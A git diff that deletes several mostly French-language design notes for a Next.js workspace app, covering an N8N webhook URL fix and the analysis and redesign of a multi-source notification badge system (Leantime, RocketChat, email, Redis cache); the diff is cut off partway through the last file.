-**NOT HTML**: -```html -... -``` - -### Check Server Logs - -After fix, you should see: -``` -Mission Created Webhook Received -Received mission-created data: { ... } -Found mission: { id: "...", name: "..." } -Updating giteaRepositoryUrl: ... -Mission updated successfully -``` - ---- - -## 📋 Complete URL Configuration - -### In N8N "Save Mission To API" Node - -**URL**: -``` -{{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created -``` - -**Method**: `POST` - -**Headers**: -- `Content-Type`: `application/json` -- `x-api-key`: `{{ $node['Process Mission Data'].json.config.N8N_API_KEY }}` - -**Body Parameters**: -- `missionId`: `{{ $node['Process Mission Data'].json.missionId }}` -- `name`: `{{ $node['Process Mission Data'].json.missionProcessed.name }}` -- `creatorId`: `{{ $node['Process Mission Data'].json.creatorId }}` -- `gitRepoUrl`: `{{ $node['Combine Results'].json.gitRepo?.html_url || '' }}` -- `leantimeProjectId`: `{{ $node['Combine Results'].json.leantimeProject?.result?.[0] || '' }}` -- `documentationCollectionId`: `{{ $node['Combine Results'].json.docCollection?.data?.id || '' }}` -- `rocketchatChannelId`: `{{ $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }}` - ---- - -## 🔍 Why This Happens - -### Next.js Routing - -Next.js has two types of routes: - -1. **Page Routes** (`app/[section]/page.tsx`): - - Matches: `/mission-created` - - Returns: HTML page - - Used for: Frontend pages - -2. **API Routes** (`app/api/missions/mission-created/route.ts`): - - Matches: `/api/missions/mission-created` - - Returns: JSON response - - Used for: API endpoints - -### The Problem - -When N8N calls `/mission-created`: -- Next.js matches it to `app/[section]/page.tsx` -- `section = "mission-created"` -- Page doesn't exist in `menuItems` -- Returns 404 HTML page - -When N8N calls `/api/missions/mission-created`: -- Next.js matches it to `app/api/missions/mission-created/route.ts` -- Executes the API handler -- Returns JSON response - ---- - -## ✅ Summary - -**Problem**: N8N receives HTML 404 page instead of JSON - -**Cause**: URL is missing `/api/missions` prefix - -**Fix**: Change URL from: -``` -{{ MISSION_API_URL }}/mission-created -``` - -To: -``` -{{ MISSION_API_URL }}/api/missions/mission-created -``` - -**After Fix**: N8N will receive JSON response and IDs will be saved to database. - ---- - -**Document Created**: $(date) -**Priority**: CRITICAL - Blocks integration IDs from being saved - diff --git a/NOTIFICATIONS_COMPLETE_SYSTEM.md b/NOTIFICATIONS_COMPLETE_SYSTEM.md deleted file mode 100644 index 0b024fa..0000000 --- a/NOTIFICATIONS_COMPLETE_SYSTEM.md +++ /dev/null @@ -1,156 +0,0 @@ -# 🔔 Système de Notifications Complet - -## ✅ Adapters Implémentés - -Le système de notifications agrège maintenant **3 sources** : - -1. **Leantime** (`leantime-adapter.ts`) - - Notifications de tâches, commentaires, mentions - - Polling toutes les 30 secondes - -2. **RocketChat** (`rocketchat-adapter.ts`) ⚡ NOUVEAU - - Messages non lus dans Parole - - Déclenchement en temps réel quand nouveau message détecté - -3. **Email** (`email-adapter.ts`) ⚡ NOUVEAU - - Emails non lus dans Courrier (INBOX uniquement) - - Déclenchement en temps réel quand nouvel email détecté - ---- - -## 🎯 Flow Complet - -### Badge de Notification - -Le badge rouge affiche maintenant le **total agrégé** : -``` -Total = Leantime (unread) + RocketChat (unread) + Email (unread) -``` - -### Déclenchement Temps Réel - -#### 1. **Nouveau Message Parole** -``` -Widget Parole détecte nouveau message - └─> totalUnreadCount augmente - └─> triggerNotificationRefresh() - └─> Invalide cache notifications - └─> NotificationService.getNotificationCount() - ├─> LeantimeAdapter.getNotificationCount() - ├─> RocketChatAdapter.getNotificationCount() ⚡ - └─> EmailAdapter.getNotificationCount() ⚡ - └─> Badge mis à jour (< 1 seconde) -``` - -#### 2. **Nouvel Email Courrier** -``` -checkForNewEmails() détecte nouvel email - └─> newestEmailId > lastKnownEmailId - └─> triggerNotificationRefresh() ⚡ - └─> Invalide cache notifications - └─> NotificationService.getNotificationCount() - ├─> LeantimeAdapter.getNotificationCount() - ├─> RocketChatAdapter.getNotificationCount() - └─> EmailAdapter.getNotificationCount() ⚡ - └─> Badge mis à jour (< 1 seconde) -``` - -#### 3. **Notification Leantime** -``` -Polling toutes les 30s - └─> LeantimeAdapter.getNotificationCount() - └─> Badge mis à jour -``` - ---- - -## 📊 Structure des Counts - -```typescript -NotificationCount { - total: number, // Total de toutes les sources - unread: number, // Total non lus de toutes les sources - sources: { - leantime: { - total: number, - unread: number - }, - rocketchat: { - total: number, - unread: number - }, - email: { - total: number, - unread: number - } - } -} -``` - ---- - -## 🔧 Fichiers Modifiés/Créés - -### Nouveaux Fichiers -- `lib/services/notifications/rocketchat-adapter.ts` - Adapter RocketChat -- `lib/services/notifications/email-adapter.ts` - Adapter Email -- `hooks/use-trigger-notification.ts` - Hook pour déclencher refresh - -### Fichiers Modifiés -- `lib/services/notifications/notification-service.ts` - Enregistrement des nouveaux adapters -- `components/parole.tsx` - Détection et déclenchement pour RocketChat -- `hooks/use-email-state.ts` - Déclenchement pour Email (déjà présent) -- `hooks/use-notifications.ts` - Écoute d'événements custom -- `app/api/notifications/count/route.ts` - Support `?force=true` -- `app/api/rocket-chat/messages/route.ts` - Retourne `totalUnreadCount` - ---- - -## 🎨 Avantages - -1. **⚡ Temps Réel** : Notifications instantanées (< 1 seconde) -2. **📊 Multi-Sources** : Leantime + RocketChat + Email -3. **💚 Efficace** : Déclenchement uniquement quand nécessaire -4. **🔄 Rétrocompatible** : Le polling reste en fallback -5. **📈 Scalable** : Facile d'ajouter d'autres adapters - ---- - -## 🚀 Résultat Final - -Le badge de notification affiche maintenant : -- ✅ Notifications Leantime (polling 30s) -- ✅ Messages non lus RocketChat (temps réel) -- ✅ Emails non lus Courrier (temps réel) - -**Total = Leantime + RocketChat + Email** 🎉 - ---- - -## 📝 Notes Techniques - -### RocketChat Adapter -- Utilise les subscriptions RocketChat -- Compte les messages non lus (`unread > 0`) -- Supporte channels, groups, et DMs - -### Email Adapter -- Utilise le cache Redis de `/api/courrier/unread-counts` -- Focus sur INBOX (principal dossier pour notifications) -- Peut être étendu pour d'autres dossiers si besoin - -### Cache Strategy -- **Leantime** : Cache 30s (aligné avec polling) -- **RocketChat** : Pas de cache dédié (utilise cache messages) -- **Email** : Cache 2 minutes (via unread-counts API) - ---- - -## 🔍 Debugging - -Pour voir les logs : -- `[ROCKETCHAT_ADAPTER]` - Adapter RocketChat -- `[EMAIL_ADAPTER]` - Adapter Email -- `[Parole]` - Détection dans widget Parole -- `[useTriggerNotification]` - Déclenchement refresh -- `[NOTIFICATION_SERVICE]` - Agrégation des counts diff --git a/NOTIFICATIONS_DEEP_ANALYSIS.md b/NOTIFICATIONS_DEEP_ANALYSIS.md deleted file mode 100644 index 5ae040b..0000000 --- a/NOTIFICATIONS_DEEP_ANALYSIS.md +++ /dev/null @@ -1,452 +0,0 @@ -# 🔔 Analyse Approfondie du Système de Notifications - -## 📋 Vue d'ensemble - -Le système de notifications est un système **multi-sources** qui agrège les notifications de plusieurs services externes (Leantime, RocketChat, Email) et les affiche dans un badge clignotant rouge dans la navbar. - -**Architecture actuelle :** -- **Service Pattern** : Singleton avec adapter pattern -- **3 Adapters implémentés** : Leantime, RocketChat, Email -- **Cache** : Redis avec TTL de 30 secondes -- **Polling** : 30 secondes via `useUnifiedRefresh` -- **Temps réel** : Système hybride avec event-driven triggers - ---- - -## 🏗️ Architecture Actuelle - -### 1. Composants Frontend - -#### `components/notification-badge.tsx` -- **Rôle** : Affiche le badge de notification et le dropdown -- **Problèmes identifiés** : - - ❌ **Logs de debug excessifs** : 6 `console.log` au render - - ❌ **Double fetch** : `manualFetch()` appelé à la fois dans `useEffect` et `handleOpenChange` - - ❌ **Pas de fonctionnalité "Mark as read"** : Les notifications ne peuvent pas être marquées comme lues depuis le dropdown - - ❌ **Pas de pagination** : Limite fixe à 10 notifications - - ❌ **Pas de tri/filtre** : Toutes les notifications mélangées - - ❌ **Pas d'actions** : Impossible d'interagir avec les notifications (ouvrir, marquer lu, supprimer) - -#### `hooks/use-notifications.ts` -- **Rôle** : Hook principal pour gérer les notifications -- **Problèmes identifiés** : - - ⚠️ **Force refresh par défaut** : `fetchNotificationCount(true)` au mount - - ⚠️ **Pas de fonction markAsRead** : Aucune méthode pour marquer comme lu - - ⚠️ **Deduplication complexe** : Utilise `requestDeduplicator` mais peut être simplifié - - ✅ **Unified refresh** : Bien intégré avec `useUnifiedRefresh` - -### 2. Backend Services - -#### `lib/services/notifications/notification-service.ts` -- **Rôle** : Service singleton qui agrège les notifications -- **Problèmes identifiés** : - - ⚠️ **Pas de méthode markAsRead** : Le service ne peut pas marquer les notifications comme lues - - ⚠️ **Background refresh inutilisé** : `scheduleBackgroundRefresh()` existe mais n'est jamais appelé - - ✅ **Cache bien géré** : Redis avec TTL approprié - - ✅ **Adapter pattern** : Architecture extensible - -#### Adapters - -**LeantimeAdapter** (`leantime-adapter.ts`) -- ✅ **Fonctionnel** : Récupère les notifications Leantime -- ❌ **Pas de markAsRead** : Ne peut pas marquer les notifications comme lues -- ⚠️ **Cache complexe** : Cache des user IDs avec TTL - -**RocketChatAdapter** (`rocketchat-adapter.ts`) -- ✅ **Fonctionnel** : Récupère les messages non lus -- ❌ **Pas de markAsRead** : Ne peut pas marquer les messages comme lus -- ⚠️ **Logique de recherche utilisateur** : Complexe, pourrait être optimisée - -**EmailAdapter** (`email-adapter.ts`) -- ✅ **Fonctionnel** : Récupère les emails non lus -- ❌ **Pas de markAsRead** : Ne peut pas marquer les emails comme lus -- ⚠️ **Support Graph API** : Gère Microsoft Graph mais logique complexe - -### 3. API Routes - -#### `/api/notifications/count` ✅ -- **Fonctionnel** : Retourne le nombre de notifications non lues -- **Support force refresh** : `?force=true` pour bypasser le cache -- ✅ **Bien implémenté** - -#### `/api/notifications` ✅ -- **Fonctionnel** : Retourne la liste des notifications -- **Pagination** : Support `page` et `limit` -- ✅ **Bien implémenté** - -#### `/api/notifications/[id]/read` ❌ **MANQUANT** -- **Problème critique** : Aucun endpoint pour marquer les notifications comme lues -- **Impact** : Les utilisateurs ne peuvent pas marquer les notifications comme lues depuis le dropdown - ---- - -## 🐛 Problèmes Critiques Identifiés - -### 1. ❌ **Pas de fonctionnalité "Mark as Read"** - -**Problème** : -- Aucun endpoint API pour marquer les notifications comme lues -- Aucune méthode dans le service ou les adapters -- Les utilisateurs ne peuvent pas interagir avec les notifications - -**Impact** : -- UX dégradée : les notifications restent "non lues" indéfiniment -- Badge rouge persiste même après avoir vu les notifications -- Pas de moyen de gérer les notifications - -**Solution nécessaire** : -1. Créer `/api/notifications/[id]/read` endpoint -2. Ajouter `markAsRead()` dans `NotificationAdapter` interface -3. Implémenter dans chaque adapter (Leantime, RocketChat, Email) -4. Ajouter bouton "Mark as read" dans le dropdown -5. Mettre à jour le count après marquage - ---- - -### 2. ❌ **Logs de debug excessifs** - -**Problème** : -- `notification-badge.tsx` contient 6 `console.log` au render -- Logs dans plusieurs fichiers (adapters, service, hooks) -- Pollution de la console en production - -**Impact** : -- Performance dégradée (logs à chaque render) -- Console difficile à déboguer -- Informations sensibles potentiellement exposées - -**Solution nécessaire** : -- Utiliser `logger.debug()` au lieu de `console.log` -- Retirer les logs de production -- Garder uniquement les logs d'erreur - ---- - -### 3. ⚠️ **Double fetch dans notification-badge** - -**Problème** : -```typescript -// Ligne 66-70 : Fetch quand dropdown s'ouvre -useEffect(() => { - if (isOpen && status === 'authenticated') { - manualFetch(); - } -}, [isOpen, status]); - -// Ligne 73-78 : Fetch au mount -useEffect(() => { - if (status === 'authenticated') { - manualFetch(); - } -}, [status]); - -// Ligne 85-89 : Fetch dans handleOpenChange -const handleOpenChange = (open: boolean) => { - setIsOpen(open); - if (open && status === 'authenticated') { - manualFetch(); - } -}; -``` - -**Impact** : -- Appels API redondants -- Charge serveur inutile -- Expérience utilisateur dégradée (loading multiple) - -**Solution nécessaire** : -- Unifier la logique de fetch -- Utiliser un seul point d'entrée -- Éviter les appels multiples - ---- - -### 4. ⚠️ **Force refresh par défaut** - -**Problème** : -- `use-notifications.ts` ligne 155 : `fetchNotificationCount(true)` au mount -- Bypasse le cache à chaque chargement initial -- Augmente la charge serveur - -**Impact** : -- Latence accrue au chargement -- Charge serveur inutile -- Cache Redis sous-utilisé - -**Solution nécessaire** : -- Utiliser le cache par défaut au mount -- Force refresh uniquement pour refresh manuel -- Aligner avec le pattern des autres widgets - ---- - -### 5. ⚠️ **Pas de pagination dans le dropdown** - -**Problème** : -- Limite fixe à 10 notifications (ligne 81 de `notification-badge.tsx`) -- Pas de "Load more" ou scroll infini -- Utilisateurs avec beaucoup de notifications ne voient pas tout - -**Impact** : -- UX limitée pour les utilisateurs actifs -- Notifications importantes peuvent être cachées -- Pas de moyen de voir l'historique complet - -**Solution nécessaire** : -- Implémenter pagination ou scroll infini -- Bouton "Load more" ou auto-load au scroll -- Afficher le total de notifications - ---- - -### 6. ⚠️ **Pas de tri/filtre** - -**Problème** : -- Toutes les notifications mélangées (Leantime, RocketChat, Email) -- Pas de tri par date, source, type -- Pas de filtre par source ou statut (lu/non lu) - -**Impact** : -- Difficile de trouver des notifications spécifiques -- UX dégradée pour les utilisateurs avec beaucoup de notifications -- Pas de moyen de gérer efficacement les notifications - -**Solution nécessaire** : -- Ajouter tri par date (déjà fait côté service mais pas exposé) -- Ajouter filtres par source (Leantime, RocketChat, Email) -- Ajouter filtre lu/non lu -- Grouper par source ou date - ---- - -### 7. ⚠️ **Pas d'actions sur les notifications** - -**Problème** : -- Impossible d'interagir avec les notifications depuis le dropdown -- Pas de bouton "Mark as read" -- Pas de bouton "Delete" ou "Dismiss" -- Pas de lien direct vers la source (sauf via `notification.link`) - -**Impact** : -- UX limitée -- Utilisateurs doivent aller dans chaque service pour gérer les notifications -- Pas de gestion centralisée - -**Solution nécessaire** : -- Ajouter bouton "Mark as read" sur chaque notification -- Ajouter bouton "Mark all as read" -- Ajouter bouton "Dismiss" pour les notifications non actionnables -- Améliorer les liens vers les sources - ---- - -### 8. ⚠️ **Background refresh inutilisé** - -**Problème** : -- `scheduleBackgroundRefresh()` existe dans `notification-service.ts` (ligne 362) -- Jamais appelé -- Code mort - -**Impact** : -- Code inutile qui complique la maintenance -- Potentiel de confusion pour les développeurs - -**Solution nécessaire** : -- Soit implémenter le background refresh -- Soit supprimer le code mort -- Le système de refresh unifié remplace cette fonctionnalité - ---- - -### 9. ⚠️ **Gestion d'erreurs incomplète** - -**Problème** : -- Erreurs génériques affichées -- Pas de retry automatique -- Pas de distinction entre erreurs temporaires/permanentes -- Pas de fallback si un adapter échoue - -**Impact** : -- UX dégradée en cas d'erreur -- Utilisateurs ne comprennent pas les erreurs -- Pas de résilience si un service est down - -**Solution nécessaire** : -- Améliorer les messages d'erreur -- Implémenter retry avec backoff exponentiel -- Distinguer erreurs temporaires/permanentes -- Fallback gracieux si un adapter échoue (afficher les autres) - ---- - -### 10. ⚠️ **Performance et optimisation** - -**Problèmes** : -- Pas de virtualisation pour les longues listes -- Re-renders potentiels excessifs -- Pas de memoization des composants de notification -- Logs à chaque render - -**Impact** : -- Performance dégradée avec beaucoup de notifications -- Expérience utilisateur ralentie -- Consommation mémoire élevée - -**Solution nécessaire** : -- Implémenter virtualisation (react-window ou react-virtual) -- Memoizer les composants de notification -- Optimiser les re-renders -- Retirer les logs de production - ---- - -## 📊 État Actuel vs État Idéal - -### État Actuel ❌ - -``` -Utilisateur ouvre dropdown - └─> Fetch notifications (force refresh) - └─> Affiche 10 notifications - └─> ❌ Pas d'action possible - └─> Utilisateur doit aller dans chaque service - └─> Badge reste rouge même après avoir vu -``` - -### État Idéal ✅ - -``` -Utilisateur ouvre dropdown - └─> Fetch notifications (cache par défaut) - └─> Affiche notifications avec pagination - └─> ✅ Actions disponibles : - ├─> Mark as read (individuel) - ├─> Mark all as read - ├─> Dismiss - └─> Ouvrir dans source - └─> Badge mis à jour immédiatement - └─> Cache invalidé - └─> Count rafraîchi -``` - ---- - -## 🎯 Plan d'Action Recommandé - -### Phase 1 : Corrections Critiques (Priorité Haute) - -1. **Créer endpoint `/api/notifications/[id]/read`** - - POST pour marquer comme lu - - Support pour tous les adapters - - Invalidation du cache après marquage - -2. **Ajouter `markAsRead()` dans les adapters** - - Implémenter dans LeantimeAdapter - - Implémenter dans RocketChatAdapter (marquer message comme lu) - - Implémenter dans EmailAdapter (marquer email comme lu) - -3. **Ajouter bouton "Mark as read" dans le dropdown** - - Sur chaque notification - - Bouton "Mark all as read" - - Mise à jour optimiste de l'UI - -4. **Nettoyer les logs de debug** - - Retirer tous les `console.log` de production - - Utiliser `logger.debug()` uniquement - - Garder uniquement les logs d'erreur - -### Phase 2 : Améliorations UX (Priorité Moyenne) - -5. **Corriger le double fetch** - - Unifier la logique de fetch - - Un seul point d'entrée - - Éviter les appels multiples - -6. **Utiliser le cache par défaut** - - Retirer `force=true` au mount - - Utiliser cache pour initial load - - Force refresh uniquement pour refresh manuel - -7. **Implémenter pagination** - - Scroll infini ou "Load more" - - Afficher le total - - Gérer le loading state - -8. **Ajouter tri/filtre** - - Tri par date (déjà fait côté service) - - Filtre par source - - Filtre lu/non lu - - Grouper par source ou date - -### Phase 3 : Optimisations (Priorité Basse) - -9. **Améliorer la gestion d'erreurs** - - Messages d'erreur plus clairs - - Retry automatique - - Fallback gracieux - -10. **Optimiser les performances** - - Virtualisation pour longues listes - - Memoization des composants - - Réduire les re-renders - -11. **Nettoyer le code mort** - - Supprimer `scheduleBackgroundRefresh()` si inutilisé - - Simplifier la deduplication si possible - ---- - -## 📝 Fichiers à Modifier - -### Backend -1. `app/api/notifications/[id]/read/route.ts` - **NOUVEAU** -2. `lib/services/notifications/notification-adapter.interface.ts` - Ajouter `markAsRead()` -3. `lib/services/notifications/notification-service.ts` - Ajouter méthode `markAsRead()` -4. `lib/services/notifications/leantime-adapter.ts` - Implémenter `markAsRead()` -5. `lib/services/notifications/rocketchat-adapter.ts` - Implémenter `markAsRead()` -6. `lib/services/notifications/email-adapter.ts` - Implémenter `markAsRead()` - -### Frontend -7. `components/notification-badge.tsx` - Nettoyer logs, ajouter actions, pagination -8. `hooks/use-notifications.ts` - Ajouter `markAsRead()`, retirer force refresh par défaut -9. `lib/types/notification.ts` - Vérifier si besoin d'ajouter des champs - ---- - -## 🔍 Points d'Attention - -1. **Synchronisation avec les sources** : Quand on marque une notification comme lue, il faut aussi la marquer dans la source (Leantime, RocketChat, Email) - -2. **Cache invalidation** : Après `markAsRead()`, invalider le cache pour que le count se mette à jour immédiatement - -3. **Optimistic updates** : Mettre à jour l'UI immédiatement avant la confirmation serveur pour une meilleure UX - -4. **Gestion des erreurs** : Si le marquage échoue, rollback l'update optimiste - -5. **Multi-sources** : Chaque adapter a sa propre logique pour marquer comme lu, il faut gérer les différences - ---- - -## ✅ Résumé - -**Problèmes critiques** : 3 -- Pas de fonctionnalité "Mark as Read" -- Logs de debug excessifs -- Double fetch - -**Problèmes importants** : 4 -- Force refresh par défaut -- Pas de pagination -- Pas de tri/filtre -- Pas d'actions - -**Optimisations** : 3 -- Background refresh inutilisé -- Gestion d'erreurs incomplète -- Performance - -**Total** : 10 problèmes identifiés nécessitant des corrections - ---- - -**Recommandation** : Commencer par la Phase 1 (corrections critiques) qui résoudra les problèmes les plus impactants pour l'UX. diff --git a/NOTIFICATIONS_FLOW_ANALYSIS.md b/NOTIFICATIONS_FLOW_ANALYSIS.md deleted file mode 100644 index 58445fe..0000000 --- a/NOTIFICATIONS_FLOW_ANALYSIS.md +++ /dev/null @@ -1,397 +0,0 @@ -# 🔔 Analyse du Flow de Notifications - -## 📋 Vue d'ensemble - -Le système de notifications est un système **multi-sources** qui agrège les notifications de plusieurs services externes (Leantime, Nextcloud, etc.) et les affiche dans un badge clignotant rouge dans la navbar. - ---- - -## 🎯 Déclenchement du Badge Rouge Clignotant - -### Condition d'affichage - -Le badge rouge apparaît lorsque : -```typescript -hasUnread = notificationCount.unread > 0 -``` - -**Fichier :** `components/notification-badge.tsx:26` - -```tsx -const hasUnread = notificationCount.unread > 0; -{hasUnread && ( - - {notificationCount.unread > 99 ? '99+' : notificationCount.unread} - -)} -``` - -### Style du badge - -**Fichier :** `components/ui/badge.tsx:18-19` - -```typescript -notification: "border-transparent bg-red-500 text-white hover:bg-red-600 absolute -top-1 -right-1 px-1.5 py-0.5 min-w-[1.25rem] h-5 flex items-center justify-center" -``` - -Le badge est **rouge** (`bg-red-500`) et positionné en haut à droite de l'icône cloche. - ---- - -## 🔄 Flow Complet de Notifications - -### 1. **Initialisation** (Au chargement de la page) - -``` -MainNav (navbar) - └─> NotificationBadge (composant) - └─> useNotifications() (hook) - └─> useEffect() [status === 'authenticated'] - ├─> fetchNotificationCount(true) // Force refresh - └─> fetchNotifications(1, 20) // Charge les 20 premières -``` - -**Fichiers :** -- `components/main-nav.tsx` - Affiche le badge -- `components/notification-badge.tsx:86-91` - Fetch initial -- `hooks/use-notifications.ts:265-277` - Initialisation - ---- - -### 2. **Rafraîchissement Automatique** (Polling) - -Le système utilise un **système de rafraîchissement unifié** qui poll les notifications toutes les **30 secondes**. - -``` -useUnifiedRefresh({ - resource: 'notifications-count', - interval: 30000, // 30 secondes - priority: 'high', - onRefresh: fetchNotificationCount(true) -}) -``` - -**Fichiers :** -- `hooks/use-notifications.ts:253-262` - Configuration du refresh -- `lib/constants/refresh-intervals.ts:12` - Interval défini -- `lib/services/refresh-manager.ts` - Gestionnaire centralisé - -**Interval de rafraîchissement :** -- **Notifications Count** : `30 secondes` (priorité haute) -- **Notifications List** : `30 secondes` (priorité haute) - ---- - -### 3. **Récupération des Notifications** (API Calls) - -#### A. Fetch du Count (Badge) - -``` -GET /api/notifications/count - └─> NotificationService.getInstance() - └─> getNotificationCount(userId) - ├─> Check Redis Cache (TTL: 30s) - └─> Si pas en cache: - ├─> LeantimeAdapter.getNotificationCount() - │ └─> API Leantime: getAllNotifications(limit: 1000) - │ └─> Compte les notifications avec read=0 - └─> Autres adapters (futurs) - └─> Cache dans Redis (30s) -``` - -**Fichiers :** -- `app/api/notifications/count/route.ts` -- `lib/services/notifications/notification-service.ts:182-310` -- `lib/services/notifications/leantime-adapter.ts:150-280` - -#### B. Fetch de la Liste - -``` -GET /api/notifications?page=1&limit=20 - └─> NotificationService.getInstance() - └─> getNotifications(userId, page, limit) - ├─> Check Redis Cache (TTL: 30s) - └─> Si pas en cache: - ├─> LeantimeAdapter.getNotifications() - │ └─> API Leantime: getAllNotifications() - │ └─> Transforme en Notification[] - └─> Autres adapters (futurs) - └─> Trie par timestamp (newest first) - └─> Cache dans Redis (30s) -``` - -**Fichiers :** -- `app/api/notifications/route.ts` -- `lib/services/notifications/notification-service.ts:61-177` -- `lib/services/notifications/leantime-adapter.ts:57-148` - ---- - -### 4. **Sources de Notifications** (Adapters) - -Actuellement, **un seul adapter** est actif : - -#### LeantimeAdapter - -**Source :** Leantime (Agilité - `agilite.slm-lab.net`) - -**Méthode API :** -```json -{ - "jsonrpc": "2.0", - "method": "leantime.rpc.Notifications.Notifications.getAllNotifications", - "params": { - "userId": , - "showNewOnly": 0, - "limitStart": 0, - "limitEnd": 1000 - } -} -``` - -**Types de notifications Leantime :** -- Tâches assignées -- Commentaires -- Mentions -- Changements de statut -- Dates d'échéance - -**Fichier :** `lib/services/notifications/leantime-adapter.ts` - -**Futurs adapters (non implémentés) :** -- NextcloudAdapter -- GiteaAdapter -- DolibarrAdapter -- MoodleAdapter - ---- - -### 5. **Cache Redis** (Performance) - -Le système utilise **Redis** pour mettre en cache les notifications et éviter les appels API répétés. - -**Clés de cache :** -- `notifications:count:{userId}` - TTL: 30 secondes -- `notifications:list:{userId}:{page}:{limit}` - TTL: 30 secondes - -**Stratégie :** -- Cache-first avec fallback API -- Background refresh si TTL < 50% -- Invalidation automatique après 30s - -**Fichier :** `lib/services/notifications/notification-service.ts:11-18` - ---- - -### 6. **Déduplication des Requêtes** - -Le système utilise un **request deduplicator** pour éviter les appels API en double. - -**Window de déduplication :** `2000ms` (2 secondes) - -**Fichier :** `hooks/use-notifications.ts:39-59` - -```typescript -const requestKey = `notifications-count-${session.user.id}`; -const data = await requestDeduplicator.execute( - requestKey, - async () => { /* fetch */ }, - 2000 // 2 secondes -); -``` - ---- - -## 🎨 Affichage du Badge - -### Composant NotificationBadge - -**Localisation :** `components/notification-badge.tsx` - -**Structure :** -```tsx - - - - - - {/* Liste des notifications */} - - -``` - -### États du Badge - -| État | Condition | Affichage | -|------|-----------|-----------| -| **Visible** | `notificationCount.unread > 0` | Badge rouge avec nombre | -| **Caché** | `notificationCount.unread === 0` | Pas de badge | -| **99+** | `notificationCount.unread > 99` | Affiche "99+" | - ---- - -## 🔍 Déclencheurs du Badge Rouge - -### 1. **Notifications Leantime** - -Les notifications sont créées dans **Leantime** lorsque : -- Une tâche vous est assignée -- Quelqu'un commente sur une tâche -- Vous êtes mentionné -- Une date d'échéance approche -- Un statut change - -**Flow :** -``` -Action dans Leantime - └─> Leantime crée notification (read=0) - └─> Polling toutes les 30s - └─> LeantimeAdapter récupère - └─> NotificationService agrège - └─> API retourne count - └─> Badge apparaît si unread > 0 -``` - -### 2. **Rafraîchissement Automatique** - -Le badge se met à jour automatiquement via : -- **Polling** : Toutes les 30 secondes -- **Ouverture du dropdown** : Fetch immédiat -- **Mount du composant** : Fetch initial - -**Fichier :** `hooks/use-notifications.ts:253-262` - -### 3. **Marquer comme lu** - -Quand l'utilisateur marque une notification comme lue : - -``` -Clic sur "Mark as read" - └─> POST /api/notifications/{id}/read - └─> LeantimeAdapter.markAsRead() - └─> API Leantime: markNotificationRead() - └─> Update local state (optimistic) - └─> Refresh count (polling) - └─> Badge disparaît si unread === 0 -``` - -**Fichier :** `hooks/use-notifications.ts:123-189` - ---- - -## 📊 Structure des Données - -### NotificationCount - -```typescript -interface NotificationCount { - total: number; // Total de notifications - unread: number; // Nombre de non lues (TRIGGER DU BADGE) - sources: { - leantime: { - total: number; - unread: number; - } - } -} -``` - -### Notification - -```typescript -interface Notification { - id: string; - source: 'leantime' | 'nextcloud' | ...; - sourceId: string; - type: string; - title: string; - message: string; - link?: string; - isRead: boolean; // false = non lue - timestamp: Date; - priority: 'low' | 'normal' | 'high'; - user: { id: string; name?: string; }; - metadata?: Record; -} -``` - ---- - -## 🚀 Points d'Entrée (Triggers) - -### 1. **Au chargement de l'app** -- `NotificationBadge` monte -- `useNotifications` s'initialise -- Fetch immédiat du count et de la liste - -### 2. **Polling automatique** -- Toutes les 30 secondes -- Via `useUnifiedRefresh` -- Priorité haute - -### 3. **Ouverture du dropdown** -- Fetch immédiat des notifications -- Rafraîchissement du count - -### 4. **Actions utilisateur** -- Marquer comme lu → Update count -- Marquer tout comme lu → unread = 0 - ---- - -## 🔧 Configuration - -### Intervalles de rafraîchissement - -**Fichier :** `lib/constants/refresh-intervals.ts` - -```typescript -NOTIFICATIONS_COUNT: 30000 // 30 secondes -NOTIFICATIONS: 30000 // 30 secondes -``` - -### Cache TTL - -**Fichier :** `lib/services/notifications/notification-service.ts:15-16` - -```typescript -COUNT_CACHE_TTL = 30; // 30 secondes -LIST_CACHE_TTL = 30; // 30 secondes -``` - ---- - -## 🐛 Debugging - -### Logs disponibles - -Le système logge abondamment : -- `[NOTIFICATION_BADGE]` - Actions du composant -- `[useNotifications]` - Actions du hook -- `[NOTIFICATION_SERVICE]` - Service backend -- `[LEANTIME_ADAPTER]` - Appels API Leantime - -### Endpoints de debug - -- `GET /api/debug/notifications` - État du système -- `GET /api/debug/leantime-methods` - Méthodes Leantime disponibles - ---- - -## 📝 Résumé : Ce qui déclenche le badge rouge - -1. **Condition :** `notificationCount.unread > 0` -2. **Source principale :** Leantime (notifications non lues) -3. **Rafraîchissement :** Toutes les 30 secondes automatiquement -4. **Cache :** Redis (30s TTL) pour performance -5. **Déduplication :** 2 secondes pour éviter les doublons -6. **Affichage :** Badge rouge avec nombre (ou "99+") - -Le badge apparaît dès qu'il y a **au moins une notification non lue** dans Leantime (ou autres sources futures). diff --git a/NOTIFICATIONS_IMPLEMENTATION_SUMMARY.md b/NOTIFICATIONS_IMPLEMENTATION_SUMMARY.md deleted file mode 100644 index 0dca526..0000000 --- a/NOTIFICATIONS_IMPLEMENTATION_SUMMARY.md +++ /dev/null @@ -1,198 +0,0 @@ -# ✅ Implémentation : Architecture Simplifiée des Notifications - -## 🎯 Objectif - -Simplifier le système de notifications en le rendant **dépendant des widgets** plutôt que d'avoir des adapters séparés qui pollent directement les services externes. - ---- - -## ✅ Fichiers Créés - -### 1. **`hooks/use-widget-notification.ts`** ✨ NOUVEAU -- Hook pour déclencher les notifications depuis les widgets -- Debounce de 1 seconde par source -- Dispatch événement `notification-updated` pour mise à jour immédiate - -### 2. **`lib/services/notifications/notification-registry.ts`** ✨ NOUVEAU -- Service simple qui stocke les counts des widgets dans Redis -- Méthodes : - - `recordCount()` : Enregistre le count d'une source - - `getCount()` : Récupère le count agrégé - - `getNotifications()` : Récupère les items pour le dropdown - - `invalidateCache()` : Invalide le cache - -### 3. **`app/api/notifications/update/route.ts`** ✨ NOUVEAU -- Endpoint POST pour recevoir les updates des widgets -- Valide les données et appelle `NotificationRegistry.recordCount()` - ---- - -## 🔄 Fichiers Modifiés - -### Backend - -#### `app/api/notifications/count/route.ts` -- ✅ Simplifié pour utiliser `NotificationRegistry` au lieu de `NotificationService` -- ✅ Plus besoin d'adapter complexe - -#### `app/api/notifications/route.ts` -- ✅ Simplifié pour utiliser `NotificationRegistry.getNotifications()` -- ✅ Plus besoin d'adapter complexe - -### Frontend - -#### `components/email.tsx` (Widget Courrier) -- ✅ Ajout de `useWidgetNotification` -- ✅ Déclenche notification quand `unreadCount` change -- ✅ Envoie les emails non lus comme items (max 10) - -#### `components/parole.tsx` (Widget Parole) -- ✅ Remplacement de 